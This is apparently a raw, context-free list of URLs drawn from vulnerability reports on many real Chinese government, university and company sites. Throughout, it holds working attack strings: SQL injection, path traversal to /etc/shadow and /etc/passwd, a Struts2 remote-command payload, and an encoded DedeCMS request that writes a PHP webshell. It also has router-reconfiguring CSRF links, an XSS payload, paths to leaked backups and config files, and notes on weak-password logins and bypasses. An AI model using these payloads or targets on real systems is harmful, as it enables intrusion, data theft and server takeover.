http://cos.sto.cn/wui/main.jsp?templateId=1# http://it.sto.cn:8080/lxb/admin/pq_select.php http://211.160.168.229 http://zhidao.www.dianping.com/uc_client/install/?language=simplified_chinese_utf8 http://zhidao.www.dianping.com/uc_server/admin.php?m=user&a=login&iframe=&sid= http://uc.m.sohu.com/uc/v3/profile/auto http://uc.m.sohu.com/ http://uc.m.sohu.com/uc/v2/homepage http://uc.m.sohu.com/uc/v3/profile/auto http://uc.m.sohu.com/uc/v2/homepage http://oa.sto.cn/e3oa/vote/vote.mdb http://211.160.170.77 http://active.zol.com.cn/08active/514cn/top_list.php?type=1 http://it365.yesky.com/cseek.productList.do?userid=295484&qq-pf-to=pcqq.c2c site:suning.com inurl:login http://sop.suning.com/scs/NewSCSHomePage.jsp?login=Bdl8BJlQcA9UNnPxZ5Iu1NdBX36Awia7SzNsl0XkxlAj8gbDH6jvZt6d+QQXQZJe http://b2bkm.suning.cn:9080/跳转到了http://b2bkm.suning.cn:9080/restrictedHomePage/index.jsp http://即可绕过认证直接访问 http://b2bkm.suning.cn:9080/eWebEditor/admin/login.jsp看到后台界面 http://b2bkm.suning.cn:9080/eWebEditor/admin/upload.jsp?id=26&d_viewmode=list&dir=../发现有个filemanager http://221.204.249.172:8081/ywadmin/login.aspx http://www.hea.gov.cn/manage/content/docmanage/previewImg1.jsp?filePath=/../..//../..//../..//../..//../..//etc/shadow%00.jpg http://www.hea.gov.cn/manage/content/docmanage/download.jsp?filePath=/../..//../..//../..//../..//../..//etc/shadow http://www.hea.gov.cn/manage/index/login.jsp http://www.1737game.com/api/banner.php?category=5 http://www.189mv.cn/movie/huodongDetails2.action?cityid=440100&id=5600?cmpid=push-ad-yxt,将第二个?改成&后就能正常显示不报错。 http://us.weibo.com/api/create_friend http://113.240.255.146:802/comp_employerbookinfo.aspx http://q.fund.sohu.com/fund/saveVoteInfo.do http://jiameng.fuanna.com/dianping/default.aspx http://bq.sto.cn/Login.aspx http://it.sto.cn:8080/lxb/xbm.php?dbm='%20or%20''= http://211.139.251.13/console/system/jsp/login.jsp http://bjic.baoji.gov.cn/cluster/webSite/tradeDetail.action?id=68 http://eyun.sh.189.cn/注册账号 
http://eyun.sh.189.cn/user/disk-up-space.jsp URL:http://wap.hoolai.com/platform/login_hoolai.action http://bj.esf.sina.com.cn http://bh.580.gov.cn/admin/ http://bh.580.gov.cn/admin/ http://jh.580.gov.cn/admin/ http://phy.cnu.edu.cn/news.php?id=262 http://wap.sina.com.cn/cms/singer.php?from=874&mediaType=2&name=%C0%EE%CF%FE%BD%DC&pid=3075&pl=down&pt=demo&pv=1&sid=900446&singerId=-1%20or%2013%3d11&tid=96905&UA=Opera&U_RID=132355204 http://decoclub.ellechina.com/calendar_cont.php?calid=99999999%20union%20select%201,%20database%28%29,version%28%29,4,5,6,7,8,9,user%28%29,11,12 http://union.winenice.com/Member/MemberBasicInfo.aspx http://union.winenice.com/Help/RetrievePwd_Step2.aspx http://www.hca.gov.cn/ http://iask.sina.com.cn/b/21253199.html?sudaref=www.soso.com&retcode=0 http://iask.sina.com.cn/b/21171279.html?from=relatedn http://www.3g.cn/recruit/jobs/list/page/1?cid= http://expert.ccidnet.com/ http://expert.ccidnet.com/plus/view.php?aid=781 http://yzb.cppsu.edu.cn/more.asp?id=639 http://tmxk.org/thread-496-1-1.html。 tmxk.org/.js http://y.duowan.com/channel2/52399485/index http://y.duowan.com/channel2/getDetail?channelId=52399485&bbsZoneId=wEkJNgE-SR4&topicId=wEqk-d1-Pi7 http://y.duowan.com/channel2/getDetail?channelId=52399485&bbsZoneId=wEqixf--ONF&topicId=wEqiyVZ-OOB URL:http://mail.agent.dns.com.cn http://mgt.dns.com.cn/main/public_doc.php?doc=sendpasswd可以把密码直接发到域名管理的邮箱里 http://kjjr.bankcomm.com/dfv/web/findBykeyword.JSP 
http://client.cmge.com/admin/Login2.action?class.classLoader.jarPath=%28%23context["xwork.MethodAccessor.denyMethodExecution"]%3d+new+java.lang.Boolean%28false%29%2c+%23_memberAccess["allowStaticMethodAccess"]%3dtrue%2c+%23a%3d%40java.lang.Runtime%40getRuntime%28%29.exec%28%27whoami%27%29.getInputStream%28%29%2c%23b%3dnew+java.io.InputStreamReader%28%23a%29%2c%23c%3dnew+java.io.BufferedReader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23k8team%3d%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getWriter%28%29%2c%23k8team.println%28%23d%29%2c%23k8team.close%28%29%29%28meh%29&z[%28class.classLoader.jarPath%29%28%27meh%27%29 http://shop104867991.taobao.com/ www.taotantan.com/trans2/share/share-show?sellerNick=ilikezl&width=950&url= http://ftpitwhc.3.chinazhost.com/to.php http://s.click.taobao.com/t_js?tu=http%3A%2F%2Fs.click.taobao.com%2Ft%3Fe%3DzGU34CA7K%252BPkqB05%252Bm7rfGGjlY60oHcc7bkKOQiRddrNEyGLx31dnc6%252Fz%252BaQS2UNDUWpebTcEEjBuk1W5odmLS8%253D%26pid%3Dmm_40208125_0_0%26ref%3Dhttp%253A%252F%252Fwww.huaxiayes.com%252Fishows.html%26et%3DjFBDOb%252FIN4eE6A%253D%253D www.taotantan.com/trans2/share/share-show?sellerNick=ilikezl&width=950&url= http://www.realtimedsp.com.cn/safe.asp http://www.sugon.com/about/newsselect?title=%'%20and%201=1-- http://www.sugon.com/about/newsselect?title=%'%20and%201=2-- http://www.sugon.com/about/newsselect?title=%%27%20%20ORDER%20BY%204-- http://www.sugon.com/about/newsselect?title=%%27%20%20ORDER%20BY%205-- http://218.200.3.22/app/ http://218.200.3.22/common/ url:http://www.xakh.gov.cn/ http://m.winenice.com/Product/Add_Car.aspx?ProductCode=ag000027&ProductName=%e5%93%a5%e7%bd%97%e9%87%8c%e5%a5%a5%e7%9a%87%e5%86%a0%e9%be%99%e8%88%8c%e5%85%b0%e9%85%92&Price=899.0 http://m.winenice.com/MyWineNice/MyOrderRePort/520130623000001.html http://m.winenice.com/MyWineNice/MyOrderRePort/520130622000001.html http://www.bankofyk.com http://www.winenice.com/json/cj_list.shtml?activeID=1&m=0.7585369871730625&n=20 
http://admin.neotv.cn/ http://m.test.hupu.com/mobile_dev.php/bbs/1857971-42.html?_sf_ignore_cache=1 http://m.test.hupu.com/.svn/entries http://www.a8admin.com//plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=40&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=44&arrs2[]=101&arrs2[]=120&arrs2[]=112&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=44&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=41&arrs2[]=32&arrs2[]=86&arrs2[]=65&arrs2[]=76&arrs2[]=85&arrs2[]=69&arrs2[]=83&arrs2[]=40&arrs2[]=57&arrs2[]=48&arrs2[]=49&arrs2[]=51&arrs2[]=44&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96&arrs2[]=44&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=57&arrs2[]=48&arrs2[]=115&arrs2[]=101&arrs2[]=99&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=103&arrs2[]=117&arrs2[]=105&arrs2[]=103&arrs2[]=101&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=41&arrs2[]=32&arrs2[]=35&arrs2[]=32&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96 
http://www.a8admin.com//plus/mytag_js.php?aid=9013 http://www.a8admin.com//plus/90sec.php http://kaoshi.dianping.com/login.aspx http://tw.weibo.com/event/emergencyRoom/send http://tw.weibo.com/event/emergencyRoom/send/process?weibo=test http://www.haiertv.cn/appstoreView/newsInfo.xhtml?wmsShopAnnounce.announceId=25 http://i.youku.com/u/id_UMTcwMjk0NA== http://i.youku.com/user_pv/id_425736_md5_1e522f6831febf75e033cfe26fd0cec4_time_1372057646.html http://i.youku.com/u/get_status?__rt=1&__ro=&uid=425736&type=user_timeline&page=1&t=1372057786017&size=10 http://stat.hebnews.cn/mysql/count/abceffgh/abceffgh.js http://agent.xinnet.com/mailmanage.do?method=viewInfo&domainName=域名&serviceCode=服务编号 http://agent.xinnet.com/mailmanage.do?method=viewInfo&domainName=域名 qing.blog.sina.com.cn/tagtop/ ftp://113.200.69.186/ ftp://113.200.69.186/tools/ http://61.150.72.222:18080/ http://113.200.69.186:8080/ ftp://113.200.69.186/ufo/ https://emb-cda.mercedes-benz.com/content/china/mpc/mpc_china_website/zhng/home_mpc/passengercars/home/new_cars/models/cls-class/_c219/configurator/configurator_c218.https.html?tp_ccci=/dsc_cn/globalsessionid/DSC_cn602C353330676828FF3634370B550D00/dsc_locale/zs_CN/appId/DSC_cn/siteLocale/zs_CN/setInDLRQFlowOfCCiFlowrq.jam1%3bjsessionid=00007PbPyBR9STTCj1ESxqRv1F4:16p746flc http://www.lj-bank.com/www.rar http://nutrition.39.net/index.aspx?id=996 http://jc.cepp.sgcc.com.cn/ckfinder/ckfinder.html http://app.finance.ifeng.com/finance/fundhtml/.svn/entries http://app.finance.ifeng.com/finance/fundhtml/.svn/text-base/global.php.svn-base http://app.finance.ifeng.com/finance/fundhtml/.svn/text-base/common_inc.php.svn-base http://v.sn.vnet.cn/WEB-INF/web.xml http://v.sn.vnet.cn/WEB-INF/classes/com/thewebpagestudio/usersurvey/SurveyServlet.class http://v.sn.vnet.cn/WEB-INF/classes/com/thewebpagestudio/visit/CmsVisitServlet.class http://v.sn.vnet.cn//WEB-INF/config_path.xml https://excashier.alipay.com 
https://excashier.alipay.com/standard/trade20001/templateFlow.htm?orderId=3c1bb81c789148ceb67eba9515aad247&action=init http://admin:admin@192.168.1.1 http://192.168.1.1/userRpm/StatusRpm.htm?Disconnect=断 http://192.168.1.1/userRpm/LanDhcpServerRpm.htm?dhcpserver=1&ip1=192.168.1.100&ip2=192.168.1.199&Lease=120&gateway=0.0.0.0&domain=&dnsserver=8.8.8.8&dnsserver2=0.0.0.0&Save=%B1%A3+%B4%E6 http://192.168.1.1/userRpm/FireWallRpm.htm?IpRule=0&MacRule=0&Save=%B1%A3+%B4%E http://192.168.1.1/userRpm/ManageControlRpm.htm?port=80&ip=255.255.255.255&Save=%C8%B7+%B6%A8 http://search.cs.wanmei.com/WEB-INF/web.xml http://search.cs.wanmei.com/WEB-INF/classes/config/spring/applicationContext-service.xml http://search.cs.wanmei.com/WEB-INF/classes/config/cfg/lore-hbm.xml http://search.cs.wanmei.com/WEB-INF/classes/resources/jdbc.properties http://jiading.tongji.edu.cn/GetFile.aspx?FileName=../Administration/admin.aspx http://jwc.tongji.edu.cn/down.jsp?tid=../liuyan/&file=index.jsp server:/usr/java/jdk1.6.0_25/jre/lib/i386:/usr/java/jdk1.6.0_25/jre/../lib/i386:/usr/java/packages/lib/i386:/lib:/usr/lib http://java.sun.com/ http://s.lakala.com/ http://s.lakala.com/rand.action?tempStr=0.7238308433443308 encap:Ethernet AC:16:2D:6F:FB:88 addr:10.1.21.67 Bcast:10.1.21.255 Mask:255.255.255.0 ae16:2dff:fe6f:fb88/64 Scope:Link MTU:1500 packets:46054995 packets:35720701 txqueuelen:1000 http://app.dns.com.cn http://wendang.dns.com.cn http://app.dns.com.cn/data/mysql_error_trace.inc http://app.dns.com.cn/admin8/login.php http://app.dns.com.cn/admin8/login.php http://wendang.dns.com.cn/admin8/login.php http://i.youku.com/u/UMTUxMDI3MDg=/feeds http://i.youku.com/u/get_status?__rt=1&__ro=&uid=3775677&type=user_timeline&page=1&t=1372078036571&size=30 http://sms.sd.vnet.cn/1.rar http://weiwen.weibo.com.zile.me http://user.huxiu.com/index.php?m=register&a=sendmail地址post四个参数,email为注册的邮箱地址,formhash是个随机数。 http://user.iiyi.com/center/notice/detail?uid1=4000754'&uid2=4000754 
http://ext.iiyi.com/exam/my_show?rid=40132 http://ext.iiyi.com/exam/my_show?rid=40132 http://www.notc.gov.cn/cn/AboutUs.aspx?m=20121226155542340145 http://www.ycsbj.org/www.ycsbj.org.rar http://www.tsrsj.cn/web.rar http://go.sohu.com/2011/yidong121/ http://go.sohu.com/2011/yidong121/insert.php http://cs.csu.edu.cn/news_show!findById.action?id=59 http://www.balincan.com/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=40&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=44&arrs2[]=101&arrs2[]=120&arrs2[]=112&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=44&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=41&arrs2[]=32&arrs2[]=86&arrs2[]=65&arrs2[]=76&arrs2[]=85&arrs2[]=69&arrs2[]=83&arrs2[]=40&arrs2[]=57&arrs2[]=48&arrs2[]=49&arrs2[]=51&arrs2[]=44&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96&arrs2[]=44&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=57&arrs2[]=48&arrs2[]=115&arrs2[]=101&arrs2[]=99&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=103&arrs2[]=117&arrs2[]=105&arrs2[]=103&arrs2[]=101&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[
]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=41&arrs2[]=32&arrs2[]=35&arrs2[]=32&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96 http://www.balincan.com/plus/mytag_js.php?aid=9013 http://www.balincan.com/plus/90sec.php http://123.233.119.251:8083/sdgp/upload/ http://www.casarte.cn/ksd/list.php?city=%E5%8C%97%E4%BA%AC http://svn.go.sohu.com/scs/platform/ http://szvkh.vanke.com/bbs/ http://szvkh.vanke.com/bbs/login.asp的用户名里面依次输入下面内容提交 http://m.tineer.com/space_friend.php?uid=107 http://try.women.sohu.com/activity/info/201 http://comment4.news.sohu.com/dynamic/cmt_floor_all_2902000000.json?pageNo=2&pageSize=10 http://www.zjgl.gov.cn/zjgl.rar http://www.syjy.gov.cn/wwwroot.zip http://www.smartisanos.org/ http://www.dapianyun.com/ domain:shciq.gov.cn http://baoshuiqu.shciq.gov.cn/article.aspx?artid=401-1 http://fengxian.shciq.gov.cn/content.asp?myform=news&id=95-1 http://huagongqu.shciq.gov.cn/NewsInfo.aspx?id=294 http://songjiang.shciq.gov.cn/downnews.asp?id=54 http://huagongqu.shciq.gov.cn/admin/ http://songjiang.shciq.gov.cn/admin/Admin_Login.asp http://huagongqu.shciq.gov.cn/admin/ http://202.100.241.36:808/forui/policy/showpolicy.aspx http://127.0.0.1/shopadmin/index.php?ctl=passport&act=login http://119.60.11.43:8000/pagefolder/zcfgquery.aspx http://service.haier.net:8087/data/ http://jiu.sohu.com http://jiu.sohu.com/baijiu/product-Y3Rzb2h1LDIwMDg.html http://jiu.sohu.com/comment.php?action=list_comment&product_id=Y3Rzb2h1LDIwMDg&page=1&from=product&random=0.6170307428110391 http://jiu.sohu.com/user.php?uid=leixy147@sohu.com(为了方便测试不马赛克了) http://jiu.sohu.com/user.php?uid=leixy147@sohu.com&action=show&active=4 http://jiu.sohu.com/price_down.php?uid=leixy147@sohu.com http://jiu.sohu.com/mywin.php?uid=leixy147@sohu.com http://jiu.sohu.com/drinklog.php?uid=leixy147@sohu.com http://jiu.sohu.com/baseinfo.html http://jiu.sohu.com/drinklog.php.php?uid=攻击者邮箱@sohu.com 
http://stats.chinapost.gov.cn/user_login.action http://www.wczbtb.com/www.rar http://wczbtb.com/admin/ http://www.wczbtb.com/eWebEditor/admin_login.asp http://marketing.haieruhome.com http://123.234.41.27/chengguocontent.php?id=18&iid=366 http://123.234.41.27/www.rar http://123.234.41.27/FCKeditor/editor/filemanager/browser/default/connectors/test.html http://127.0.0.1/?u=f234 http://m.cheshi.com/web/click.php?type=click_pc&mid=85 http://epaper.crec4.com/ http://epaper.crec4.com/files/wjwb/456852.asp;page.jpg http://epaper.crec4.com/files/wjwb/pic_bulb.asp;.gif http://222.222.63.99:8213/gt/suginput.aspx?CorpCode=1902 http://183.60.177.83:9005/quhappyInter/loginAction.action http://www.sztaiji.com/sztaiji.rar http://www.zzmetro.com/adminindex.jsp jboss-4.2.2.GA/server/default/./deploy/jboss-web.deployer/ROOT.war/]$ http://koubei.jumei.com/review_U3eb202391155f8ec.html http://shop.tcl.com//Userprofile/doPass.html http://121.14.4.202:8008/log/ https://xianan.gov.cn/发现是天融信的产品,然后尝试弱口令扫描 http://vip.book.sohu.com http://vip.book.sohu.com/user/userhome.php http://vip.book.sohu.com/user/edit.php http://vip.book.sohu.com/account/index.php http://vip.book.sohu.com/user/trend.php http://vip.book.sohu.com/user/user_liketype.php?lovetype= http://61.156.3.105:8080/tydw/login/adminindex.jsf http://duomai.com/index.php?m=scoremall&a=detail&production_id=29 http://duomai.com/index.php?m=scoremall&a=slist&order=default&category_id=21 http://duomai.com/index.php?a=slist&category_id=26%20and%20sleep%282%29%20&m=scoremall http://duomai.com/index.php?a=forget_pwd&m=siter http://duomai.com/index.php?a=order&m=scoremall http://www.duomai.com/info.php http://www.hhht-ds-zy.gov.cn/news_x.aspx?id=XXX http://www.hhht-ds-zy.gov.cn/admin/login.htm http://whois.chinaz.com/smartisan.cn http://202.149.225.105/ http://wap.sz.gov.cn//admin/XWTP$content.action?docid= http://t.sohu.com/twAction/insertTwitter http://ebuy.skoda.com.cn/ http://fashion.jstv.com/phpmyadmin/index.php 
http://product.aili.com/caches/configs/.svn/text-base/database.php.svn-base http://show.aili.com/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=47 http://show.aili.com/index.php?50&attrpinyin=chuangshangyongpin http://wooyun.org/bugs/wooyun-2013-025740 http://www.gzgwbn.com.cn/ http://www.gzgwbn.com.cn/wwwroot.rar http://www.testin.cn/portal.action?op=Portal.index http://pilots.caac.gov.cn/examTH/namequery.asp http://www.pcpe.cn/zbbbs/jsp/news_editsave.jsp?fldm=101001 http://net.lakala.com/robots.txt/a.php http://net.lakala.com/View/1%3Cimg%20src=logo.gif%20onerror=alert%28document.domain%29%3E/ac/RA000851/cc/RC0002700 http://www.yxhouse.net/ http://www.yxhouse.net/tbs/shownewstext.action http://ns.huangshi.gov.cn/,探测出3389和21端口开放,并提供了http://ns.huangshi.gov.cn/phpMyAdmin入口,然后尝试弱口令登录,用户名root,密码root登录成功 http://60.208.75.174:8080/ http://uec.mail.10086.cn/admin/login.jsp www.xinnet.com/xinnetol.war http://www.xinnet.com/xinnetol.war http://web.youxipai.com/games/dhhz/detail.php?colName=pic&id=27 http://web.youxipai.com/kefu/helplist?catid=8 http://my.feixin.10086.cn/user/modify/ http://www.scit.gov.cn/login!login www.fingerage.com http://www.fingerage.com/article.html?id=18 xlink:href= http://www.w3.org/2000/svg http://t.sohu.com/event/insertTw?msg=testtest http://t.sohu.com/debate/sendMsg?did=6804&msg=tecsrfst http://www.swiet.com.cn:8188/index.action http://www.oir.pku.edu.cn:8081/bd@manager/login.php?gotopage=%2Fbd%40manager%2Findex.php site:eat.gd.sina.com.cn http://eat.gd.sina.com.cn/admin/pic.php http://eat.gd.sina.com.cn/admin/manager_checked.php http://eat.gd.sina.com.cn/admin/manage_rstrt.php http://eat.gd.sina.com.cn/admin/manage_rstrt_union.php http://eat.gd.sina.com.cn/admin/passages_post.php www.xywz120.com http://www.baidu.com.whmsyy.net/ http://vender.railstone.com.cn/registAction.action www.hevttc.edu.cn http://www.chekucafe.com/content_mtbd2.php?NID=191 http://www.chekucafe.com/content_cygs.php?NID=41 
http://u.youxipai.com/support/submit?id=23796 http://iss.ruc.edu.cn/article.php?aid=52 http://222.66.109.136:8088/hr/zzbyuangong_all.action http://www.dns.com.cn/newmember/binding/mobile_binding.php http://www.ksf-csxy.com/#/home/,可以直接通过请求一个文件,直接快速地获得大量积分及抽奖资格(原本需要几十分钟才能完成的)。另外通过输入某个网址,可以直接查看到详细的中奖者信息,中奖者真实姓名、手机、联系地址、电子邮箱等一览无余。 http://125.76.237.175/index.aspx即可 site:bai.sohu.com inurl:action http://democn.b2b-builder.com/?m=offer&s=offer_list&id=1004 http://www.sdxtgh.gov.cn/sys_login.asp http://gg.pp.cc/waibao/hl/active.php?year=2013&month=6&date=6 http://bb.zjj.gov.cn/news/sys1/wz/wz_add.asp?id=2013 http://jxpg.zjj.gov.cn/news/sys/wz/wz_add.asp?id=3291 http://map.srcb.com:8055/srcbGIS/searchCompany.do?disUID=-1&companyTypeID=1&pageNO=1&pageSize=10&companyName=%E5%8D%97%E6%B1%87%E6%94%AF%E8%A1%8C%E8%90%A5%E4%B8%9A%E9%83%A8 http://www.inmyshow.com/home/read.php?id=58 http://minisite.youku.com/pub2/paike/form2.php http://minisite.youku.com/pub2/paike/form.php http://minisite.youku.com/pub2/paike/admin.php http://wifi.189.cn/ http://61.144.36.122/aisino/aisino/portal/newcenterdetail.do?code=00000101&index=84017 http://61.144.36.122/jmx-console/ url:http://f-roadpay.com.cn/froadpay/FCKeditor/editor/filemanager/browser/default/browser.html?type=File&connector=connectors/jsp/connector http://www.hbjs.gov.cn/jcms/m_5_e/init/messagebook/opr_readfile.jsp?filename=../../../../../../../../../../../../../../../../etc/passwd http://www.lzcgq.gov.cn/jcms/m_5_e/init/messagebook/opr_readfile.jsp?filename=../../../../../../../../../../../../../../../../etc/passwd http://home.ithaier.com//UserFiles/Flash/3.asa;.jpg www.52pk.com http://flash.52pk.com/list/search2.php?keyword=%C4%D0%C9%FA http://web.youxipai.com/kefu/helplist?catid=8 http://vip.book.sohu.com/ http://vip.book.sohu.com/m http://jyz.sdxm.gov.cn/#/Default.xaml http://tuchong.com/account/reset/?code=1372415571&sign=9c4a3cab666fcddfdcec52a0d87ff73f&email=smtp_admin%40yeah.net 
http://weibo.pp.cc/member.php?mod=login&type=sina www.pp.cc http://plus.youxipai.com/search.php?typeid=3&filesize=1t1 http://bbs.dedecms.com http://t.pp.cc/time/index.php?mod=send&action=save&account=&inajax=1&random=983&id=0&isSync=1&content=test2323&uploadpic=&contentpic=&power=0&contentid=0&pid=0&mypid=0&date=2013-06-29&hour=00&minute=21&diff=10&istimer=0&referer=&musicurl=&musictitle=&musicauthor=&videourl=&videopic=&videotitle=&videoshort=&playerurl=©_one=0©_two=0©_three=0©_four=0&submit=yes&rswitch=1&myfrom=pp http://159.226.76.101/jsp-examples/jsp2/jspx/textRotate.jsp?o=index http://159.226.76.101/jsp-examples/jsp2/jspx/update.jsp http://renmai.weibo.com/0/resume/download http://www.csndmc.ac.cn/newweb/secondpage.jsp?id=1120 http://wx.pp.cc http://wx.pp.cc/wb_ajax/update_action?act=del&id_str=任意ID http://wx.pp.cc/wb_ajax/preview/任意文章ID/1372420599?t=1372403376&preview=1 http://survey.game.renren.com/index.php?sid=71521 http://survey.game.renren.com/admin/admin.php http://58.252.101.42:9083/rtssh/LoginAction.action http://i.sohu.com也有发微博功能,和http://t.sohu.com是同步的,那么,就来抓抓包看看吧。 http://i.sohu.com/a/app/mblog/save.htm?_input_encode=UTF-8 http://t.sohu.com/gy/twitter/support?msg=csrf%20by%20vip&wgyId=5313 http://fx.qfpay.com/admin/login http://www.vrking.net网站后台存在弱口令。后台上传获得webshell权限 http://www.vrking.cn/admin http://www.enet.com.cn/edigi/inforcenter/index.jsp http://pay.qq.com/ http://www.jdjob88.com/myNew/down.php?filename=../index.php http://oa.18yl.com/default.aspx IP:http://125.39.72.67:8080/ IP:http://125.39.72.58:8080/ http://soso.music.qq.com/fcgi-bin/cgiSearchKeyWord?w=aaa http://soso.music.qq.com/fcgi-bin/cgiSearchKeyWord?w=aaa%bf http://job.lzu.edu.cn/search!getInfoSearch.action http://pet.pp.cc/index.php?m=userset&action=savePersonalBasic http://wx.pp.cc/index.php/wb_u/my_editwxuser/33789 http://wx.pp.cc/index.php/wb_u/my_editwxuser/33790 http://lelink.ecare365.com/admin/index.php http://lno.pw/exp1.htm处 
http://www.quamnet.com/newscontent.action?listSectionCode=NEW_REST&articleId=2930903 http://test.baidu.com/crowdtest/default/index http://developer.baidu.com/dev#/account/new http://yun.baidu.com/cloud/home http://tuan.baidu.com/ http://lvyou.baidu.com/user/edit/info/ http://campus.baidu.com/ http://app.baidu.com/app/enter?appid=104206 http://developer.baidu.com/dev#/account/new http://www.surfingjs.com/开始渗透,齐博cms,管理员弱口令不用我说了吧,后台地址也不知道改一下,本来后台拿shell还是比较麻烦的,不过还是有办法,请百度,讲解很详细,服务器配置不当,权限大得一塌糊涂,直接执行命令,添加用户,登录服务器,得到管理员帐号密码,用相同密码登录内网服务器。至此渗透完成 http://pplms.cn/x/admin/IndexManage.asp http://m.the9.com/developer/cn/ http://m.the9.com/developer/cn/newsshow.php?id=507 http://m.the9.com/developer/cn/newsshow.php?id=507 http://bbs.dedecms.com http://10010app.cn/iweb/ http://www.hzsany.com http://www.hzsany.com/load.do?oper=goToZwsq&menuId=5&code=zwsq http://www.sanyedu.com/ http://www.sanyedu.com/FCKeditor/editor/filemanager/upload/test.html http://parts.sanygroup.com/ http://sanyphoto.sanyhe.com/入侵 http://t.sohu.com/live/insertw?lid=3670&msg=csrftest http://www.hdgl.gov.cn/read_news.php?id=179 http://www.hdgl.gov.cn/read_news.php?id=162 http://www.kugou.com/newuc/user/resetpwd/code=EE0544XXXXX4CEBB2E41E56C8E0A6413E43FA3FC19B9E0109DC39CD44C7690639226405CB880FC5C514494DB1424138BBEE12128F8DFFA51BE00B1B03EDFAF2CF5939DF58D006AD7B87D360C02F506673E30A239B3E70E7D4D1C7A3221E867004F138738844FED20CB18DCB38C9394AAXXXXXXX3909CAE http://www.kugou.com/newuc/user/resetpwd/code=EE0544E28Bxxxxxxxxx6A370EBF23FC56592BFEC3962E8156A71054BE3594F143AEF142A1425AE5F09E961A040DE6F90F8F305C5E866A8A4EF00DB71289745F6F08CAA790F5AA67060541354E57E71BE58CE00B80930 http://cu.17k.com/cuser/updateCuserInfo.action?cuser.id=1 http://sxpp.sina.com.cn/doc/1.php http://minisite.163.com/2006/0615/abbott/page09.php?userID=209 http://cms.netease.com:9039/ http://www.hbrf.gov.cn/www.rar http://www.hbrf.gov.cn/upload/ http://www.hbpop.gov.cn/tongji/ http://www.hbpop.gov.cn/tongji/Default.aspx 
